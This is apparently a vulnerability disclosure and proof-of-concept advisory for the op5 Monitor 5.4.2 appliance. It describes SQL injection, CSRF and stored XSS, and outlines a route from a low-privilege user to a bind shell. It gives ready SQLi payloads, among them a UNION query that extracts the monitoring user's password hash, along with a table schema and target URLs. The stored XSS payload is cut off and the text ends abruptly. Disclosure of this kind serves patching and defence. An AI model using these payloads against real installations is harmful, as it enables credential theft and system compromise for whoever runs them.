`# Author: loneferret of Offensive Security # Product: op5 Monitoring (VM appliance) # Version: 5.4.2 # Vendor Site: http://www.op5.com/ # Software Download: http://www.op5.com/get-op5-monitor/get-started/ # Software Description: # op5 is a market leading developer of Open Source Management solutions. # op5 develops and delivers enterprise-class software for monitoring and administration # of the whole IT, from hardware and software all the way to virtual or cloud based services. # The solutions comes in a fully supported package called op5 Monitor. The architecture # supports scalability from the small and business critical IT to the very large IT with # tens of thousands of actively controlled services. # Vulnerabilities: # SQL Injection # Cross Site Request Forgery # Stored XSS # Description path to Shell: # Several vulnerabilities are present in this software. All of which need different # levels of authentication. SQLi, CSRF and Stored XSS are present and can be # triggered giving variant degrees of results. From interesting to just plain annoying. # # But most interesting is the admin's (or the default monitor user) ability to run # shell commands from the web-interface. Although these commands are limited, it is # still possible to get a shell providing some conditions are met. # # As all of the vulnerabilities are post-authentication, it assumes the attacker is # a user with access to the web application. In this case, a low-privilege user is enough to # get the ball rolling in getting a shell. With enough access our "disgruntled employee" # can leverage the XSS & CSRF vulnerabilities and trick the higher privileged users to # setup a Bind-Shell. # SQLi PoC 1: # Minimum Access Rights needed: authorized_for_all_hosts # Page: /index.php/status/hostgroup_grid?items_per_page= # Original SQL statement called: select * from hostgroup limit 0 union 10 offset 0 # Injection point: select * from hostgroup limit 0 union offset 0 # Payload: 0' union select 1,2,3,4,5,6,7-- # Get password hash for user with '1' (usually monitor) # hostgroup_grid?items_per_page=0 union select 1,2,(select password from users where id=1),4,5,6,7-- # mysql> describe users; # +---------------+------------------+------+-----+----------+----------------+ # | Field | Type | Null | Key | Default | Extra | # +---------------+------------------+------+-----+----------+----------------+ # | id | int(11) unsigned | NO | PRI | NULL | auto_increment | # | realname | varchar(100) | NO | | NULL | | # | email | varchar(127) | NO | | NULL | | # | username | varchar(100) | NO | UNI | | | # | password_algo | varchar(20) | NO | | b64_sha1 | | # | password | varchar(50) | NO | | NULL | | # | logins | int(10) unsigned | NO | | 0 | | # | last_login | int(10) unsigned | YES | | NULL | | # +---------------+------------------+------+-----+----------+----------------+ # SQLi PoC 2: # Page: all?items_per_page= # https://victim/monitor/index.php/status/service/all?items_per_page=25,0-- # Stored XSS PoC: # Minimum Access Rights needed: authorized_for_all_hosts # authorized_for_all_host_commands # Page: /index.php/command/submit?host=[SYSTEM-NAME]&service=&cmd_typ=ADD_HOST_COMMENT # In the Comment input field # Payload: #

Query Builder